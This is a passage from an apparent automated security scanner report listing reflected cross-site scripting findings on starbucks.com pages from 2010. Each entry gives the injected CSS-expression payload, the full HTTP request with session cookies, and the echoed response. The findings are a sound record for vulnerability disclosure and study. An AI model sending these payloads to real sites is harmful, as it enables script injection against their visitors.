User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:15 GMT Connection: close Content-Length: 39114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/> ...[SNIP]...
3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/flavors-in-your-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:03:56 GMT
Connection: close
Content-Length: 43928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/> ...[SNIP]...
3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:39 GMT
Connection: close
Content-Length: 52482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/> ...[SNIP]...
3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/caramel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:26 GMT
Connection: close
Content-Length: 42434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/> ...[SNIP]...
3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/cinnamon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:59 GMT
Connection: close
Content-Length: 42477
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/> ...[SNIP]...
3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/savoring
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:58:58 GMT
Connection: close
Content-Length: 41224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/> ...[SNIP]...
3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/vanilla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:43 GMT
Connection: close
Content-Length: 42403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/> ...[SNIP]...
3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:03 GMT
Connection: close
Content-Length: 52822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/> ...[SNIP]...
3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:31 GMT
Connection: close
Content-Length: 42269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/> ...[SNIP]...
3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/> ...[SNIP]...
3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/> ...[SNIP]...
3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/> ...[SNIP]...
3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/> ...[SNIP]...
3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/flavored-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/> ...[SNIP]...
3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
